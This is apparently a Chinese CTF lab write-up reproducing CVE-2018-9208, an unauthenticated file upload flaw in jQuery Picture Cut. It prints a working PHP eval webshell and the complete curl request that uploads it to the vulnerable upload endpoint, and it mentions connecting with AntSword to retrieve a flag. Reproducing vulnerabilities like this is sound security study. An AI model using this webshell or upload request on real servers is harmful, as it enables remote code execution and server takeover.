jquery-picture-cut 任意文件上传(CVE-2018-9208)

目录

1、漏洞描述

2、访问ip:port

3、一句话木马:exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag


1、漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207

2、访问ip:port

3、一句话木马:exploit.php

复制代码
<?php @eval($_POST['a']);?>

4、上传一句话木马

复制代码
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag

相关推荐
易知微EasyV数据可视化11 小时前
定制化3D组件开发:打造差异化孪生体验
前端·人工智能·经验分享·数字孪生
多加点辣也没关系11 小时前
JavaScript|第24章:事件循环与并发模型
开发语言·javascript·ecmascript
超防局11 小时前
网络安全渗透测试常用工具详解
网络·安全·web安全
茶栀(*´I`*)11 小时前
Android 测试入门指南:ADB 基础配置与常用设备管理命令解析
android·adb
前端炒粉11 小时前
Vue2 SSE 流式对话完整前端代码
前端·sse·流式输出
Fnetlink112 小时前
2026年SDWAN供应商如何选,从“连通“到“智连“的架构演进
大数据·网络安全
BIM云平台开发12 小时前
【App.vue里跟踪页面跳转和用户ID】
开发语言·前端·javascript
汪汪大队u12 小时前
Zabbix 6.0 部署踩坑记:从启动失败到 Web 成功访问
前端·zabbix
顺颂时绥_112 小时前
new Set 过滤数据实战
前端
赵大仁12 小时前
Next.js + Vercel AI SDK 实战:30 分钟搭出流式 Chat 页面
前端·ai·实战·react·next.js·vercel